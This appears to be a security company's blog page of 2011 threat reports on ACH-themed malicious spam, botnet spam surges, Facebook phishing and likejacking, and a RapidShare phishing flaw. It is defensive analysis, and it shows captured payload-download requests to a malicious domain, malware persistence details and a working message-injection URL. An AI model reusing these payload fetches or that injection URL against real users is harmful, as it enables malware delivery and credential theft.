Posts Tagged ‘Featured’

View All MalwareView All Spam

An analysis of the ACH spam campaign

By Rodel Mendrez  •  September 6th, 2011  •   Malware Spam

Recently, we have seen a resurgence of malicious spam campaigns using an “ACH” theme. The Automated Clearing House (ACH) is an an electronic network for financial transactions in the United States overseen by NACHA. Last week, we came across a suspicious looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. After closer investigation, we determined that it was indeed a fake ACH notification. The message contained an attached malicious file using the filename “document.zip”. As suspected, the malicious file attachment was a downloader that we have seen a lot of lately – Chepvil.

ACH spam campaign from the Donbot botnet

 

The Chepvil downloader, unsurprisingly, proceeded to retrieve more than just one piece of additional malware. First was the password stealing malware, Zbot, which was obtained from the domain name rattsillis[dot]com using a standard HTTP request, downloading the file “s.exe” – a Zbot variant.

GET /s.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: rattsillis.com
Cache-Control: no-cache

The file “s.exe” is executed immediately after being downloaded and drops the following files in the infected system:

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl.0 – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Iqkohi\lady.exe – dropped copy of Zbot itself

C:\Documents and Settings\{USER}\Application Data\Microsoft\Address Book\Administrator.wab – an empty Windows address book.

Zbot then attempted to connect to a random generated domain to contact its command and control server.

The second piece of malware that Chepvil downloaded was a proxy-based spambot, an executable file “22.exe” from the same domain rattsillis[dot]com.

GET /22.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rattsillis.com
Cache-Control: no-cache 

The file “22.exe” was interesting because we had not encountered it before. It was detected by 22 out of 45 antivirus programs with various generic detection names, although some identified it as Trojan.Scar.eaml. Upon execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe, with a file size of around 10kb.

C:\Documents and Settings\{user}\Local Settings\Temp\svchost.exe

It also drops another copy of itself in the Application Data folder using the filename format: KB{6 random number}.exe.

C:\Documents and Settings\{user}\Application Data\KB117188.exe

Then the malware adds an autorun registry key to ensure that it will survive on Windows start up.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

KB117188.exe = “”C:\Documents and Settings\{user}\Application Data\KB117188.exe”"

After installation, the parent spambot process executes the file Svchost.exe it dropped in the Windows TEMP folder and exits itself.

Instead of listening to a specific port and waiting, the proxy spambot attempts to connect to a control server by performing a standard DNS A query to the domain name luis-vuitton-elite[dot]com. However if that fails, the bot attempts to connect to a randomly generated domain name.

 

The malware code that attempts to connect to the control server

 

Once connected, the proxy spambot initializes port 1001 where it sends and receives packets of data from the control server.

Exchange of data between the control server and the spambot

 

Meanwhile at port 1002, the spambot receives the actual spam data from the control server and relays this data to the final recipients. This simple proxy can relay spam at a rate of up to 1000 messages per hour.

Spam is received by the spambot from the control server and relayed to the recipients.

 

The command and control server’s IP address is based in Germany:

WHOIS information about the control server

 

This spambot’s recent spamming activities includes both pharmaceutical, and further ACH campaigns that appears to be from NACHA.org; and are very similar to the one which led to this infection in the first place.

Sample spam email from the Proxy-based spambot

In conclusion, there is not much that is new in this sequence of events. A spammed-out trojan downloader which triggers the execution of multiple pieces of malware on the host, including the obligatory data stealer, and a spambot to further propagate the nastiness. As we always say, there is no patch for social engineering and the best way to protect yourself is to be cautious.

Tags:    |    |    |    |    |    |  

View All Spam

Massive Rise in Malicious Spam

By Rodel Mendrez  •  August 16th, 2011  •   Spam

In April this year, we reported on a spike in malicious spam. Yes, that was a significant increase but not as massive as we have observed this week. From the beginning of August, we have observed a huge surge of malicious spam which far exceeds anything we have seen over the past two years, including prior to the SpamIt takedown last October. The majority of the malicious spam comes from the Cutwail botnet, although Festi and Asprox are among the other contributors.

 

Last week malicious spam made up at least 13% of the total spam volume we received which is unusual. Yesterday that number spiked to 24%.

Spam by category as of last week

Four of the campaigns, which we identified as originating from the Cutwail botnet are mostly recycled spam themes – Fedex, credit card, changelogs and invoices. The malware is attached within a compressed ZIP archive and is a Trojan that downloads additional malware including Fake AV, SpyEye and the Cutwail spambot itself.

Fedex

Fedex Spam Campaign

Credit Card Blocked

Credit Card Blocked spam campaign

Invoice

Invoice spam campaign

Change Log

Change Log spam campaign

 

Meanwhile, Asprox is continuing to send out malicious hotel transaction spam. The attached malware in this spam campaign installs a password stealer and Fake AV.

Sample of malicious spam sent by Asprox

 

The Festi botnet has also joined the fray and is sending a malicious “UPS” campaign that distributes the Chepvil Trojan, a downloader that is also installing Fake AV.

UPS spam campaign sent by Festi

This is an epic amount of malicious spam. After multiple recent botnet takedowns, cyber criminal groups remain resilient, clearly looking to build their botnets and distribute more fake AV in the process. It seems spammers have returned from a holiday break and are enthusiastically back to work.

Tags:    |    |    |  

View All Phishing

‘Just applied for my own @facebook.com email account’ Phish Spreading

By Satnam Narang  •  March 11th, 2011  •   Phishing

There is a new scam making the rounds on Facebook today.  This particular scam is surrounding Facebook’s recently revamped Messaging product, which now gives Facebook users an opportunity to own a @facebook.com e-mail address.  In the past, there were scams surrounding the launch of this product, which followed in the footsteps of similar Facebook scams: requiring Facebook users to authorize a rogue application, fill out a survey to earn the scammers referral money, and at the end, users would be redirected to http://facebook.com/about/messages

Today’s scam is different – users are now being phished for their Facebook login credentials:

Facebook E-Mail Scam Wall Post

New Facebook Phishing Campaign Spreading

Read More

Tags:    |    |    |    |    |  

View All Cybercrime

Can’t Believe A Girl Did This Because of Justin Bieber? You Shouldn’t

By Satnam Narang  •  February 28th, 2011  •   Cybercrime

We are currently monitoring a Facebook “likejacking” scam that is similar to previous campaigns that were first observed in 2010.

Justin Bieber Likejacking Scam Spreads on Facebook

Justin Bieber Likejacking Scam Spreads on Facebook

“Likejacking” is a term that is specifically used to refer to a “clickjack” that leads to an end user unknowingly “liking” a website via the social network, Facebook.  By tricking users into liking the page, a post is published to their Facebook walls and can be viewed by their friends and family.

Read More

Tags:    |    |    |    |    |    |  

View All Phishing

RapidShare.com – The Phishing Begins

By Yaniv Miron  •  February 20th, 2011  •   Phishing

A few weeks ago, M86 Security Labs discovered how to create a phishing page on RapidShare.com. As most of you probably know, RapidShare is one of the largest file sharing websites, with thousands of users worldwide.

While trying to download a file from RapidShare.com we encountered an error message indicating that the servers were busy.

We decided to test the error message and found that there is an improper input validation vulnerability in the “downloaderror” field.

Below is the original error message from RapidShare:

RapidShare.com Error message – Too many users downloading…

In the following screen, we see a fake phishing message that offers users the opportunity to buy a premium account for RapidShare:

RapidShare.com Fake Error message

A closer look:

For further information, see this demo link:

http://rapidshare.com/#!downloaderror|3|623624|test.avi|723|Too%20many%20users%20downloading%20from%20this%20
server%20right%20now.%20Please%20call%201-800-555-fake-premium%20
or%20email%20your%20Credit%20Card%20to%20fake@premiumfake.com
%20to%20get%20a%20premium%20account%20for%20only%209.95$%20a%20month%20!!!

In addition, we can control all of the “downloaderror” fields. For example, the file folder (623624), the file name (test.avi), and of course the error message.

This type of improper input validation can help malicious attackers create phishing pages within RapidShare.com. A user that receives an email or a link to the malicious phishing page could unknowingly give away credit card information to the malicious attacker either by email or by a phone call.

We contacted RapidShare.com regarding this subject and received a response from the RapidShare Abuse team assuring us that they have fixed the issue.

Tags:    |    |    |    |